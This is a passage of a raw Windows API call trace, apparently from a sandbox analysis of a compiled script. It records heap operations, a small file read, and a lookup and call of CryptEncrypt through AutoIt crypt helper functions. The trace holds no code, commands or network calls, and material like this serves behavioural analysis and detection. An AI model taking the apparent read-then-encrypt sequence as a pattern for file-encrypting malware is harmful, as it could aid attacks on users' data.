hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0269.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0269.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0269.199] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0269.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0269.199] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0269.199] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.199] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0269.200] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0269.200] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0269.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0269.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0269.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0269.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0269.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0269.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0269.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0269.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0269.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0269.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0269.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0269.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0269.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0269.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0269.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x125d020 [0269.205] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0269.205] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x17c, lpOverlapped=0x0) returned 1 [0269.206] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0269.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0269.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0269.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0269.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0269.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x17c) returned 0x978328 [0269.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x125d020 | out: hHeap=0x970000) returned 1 [0269.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0269.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0269.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0269.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0269.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0269.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0269.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0269.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0269.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x17c) returned 0x9784b0 [0269.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978328 | out: hHeap=0x970000) returned 1 [0269.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0269.210] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0269.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0269.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0269.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0269.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0269.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x17c) returned 0x978328 [0269.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0269.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978328 | out: hHeap=0x970000) returned 1 [0269.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0269.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0269.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0269.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0269.210] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0269.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0269.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0269.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0269.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0269.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0269.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0269.210] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0269.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e980 [0269.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0269.211] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0269.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e980 | out: hHeap=0x970000) returned 1 [0269.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0269.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0269.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c18 [0269.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0269.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0269.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0269.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0269.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x17c) returned 0x978328 [0269.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0269.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b58 [0269.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0269.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0269.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0269.211] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.212] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.212] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.212] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.212] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.212] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.212] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0269.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0269.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0269.212] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0269.212] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0269.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e980 | out: hHeap=0x970000) returned 1 [0269.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0269.212] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0269.213] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0269.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0269.213] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0269.213] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0269.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e980 | out: hHeap=0x970000) returned 1 [0269.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0269.213] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0269.213] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0269.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0269.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0269.213] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0269.213] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.213] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.215] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.215] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0269.215] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.216] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0269.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9b8 | out: hHeap=0x970000) returned 1 [0269.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0269.216] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0269.216] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0269.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0269.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51fd0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0269.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fd0 | out: hHeap=0x970000) returned 1 [0269.216] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0269.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fa0 | out: hHeap=0x970000) returned 1 [0269.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0269.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e540a8 [0269.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0269.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0269.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0269.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0269.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0269.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0269.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0269.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0269.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0269.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0269.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0269.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0269.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0269.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0269.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0269.217] CryptEncrypt (in: hKey=0xa872d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x17c, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x180) returned 1 [0269.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f148d8 [0269.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0269.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0269.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520a8 [0269.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52150 [0269.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520f0 [0269.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0269.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520f0 | out: hHeap=0x970000) returned 1 [0269.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0269.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52150 | out: hHeap=0x970000) returned 1 [0269.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520f0 [0269.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52108 [0269.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f10 [0269.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0269.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f10 | out: hHeap=0x970000) returned 1 [0269.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0269.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52108 | out: hHeap=0x970000) returned 1 [0269.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52108 [0269.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52018 [0269.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ec8 [0269.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0269.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ec8 | out: hHeap=0x970000) returned 1 [0269.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0269.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52018 | out: hHeap=0x970000) returned 1 [0269.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52120 [0269.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ec8 [0269.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fd0 [0269.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0269.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fd0 | out: hHeap=0x970000) returned 1 [0269.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0269.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ec8 | out: hHeap=0x970000) returned 1 [0269.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52018 [0269.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52198 [0269.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52138 [0269.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0269.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52138 | out: hHeap=0x970000) returned 1 [0269.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0269.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52198 | out: hHeap=0x970000) returned 1 [0269.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52030 [0269.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52138 [0269.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fd0 [0269.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0269.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fd0 | out: hHeap=0x970000) returned 1 [0269.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0269.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52138 | out: hHeap=0x970000) returned 1 [0269.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52198 [0269.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fb8 [0269.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ef8 [0269.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0269.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ef8 | out: hHeap=0x970000) returned 1 [0269.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0269.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fb8 | out: hHeap=0x970000) returned 1 [0269.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ef8 [0269.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52060 [0269.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52048 [0269.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0269.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52048 | out: hHeap=0x970000) returned 1 [0269.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0269.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52060 | out: hHeap=0x970000) returned 1 [0269.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0269.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0269.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0269.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0269.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0269.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0269.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0269.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0269.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520d8 | out: hHeap=0x970000) returned 1 [0269.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0269.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0269.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0269.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0269.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0269.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0269.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0269.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0269.220] HeapFree (in: 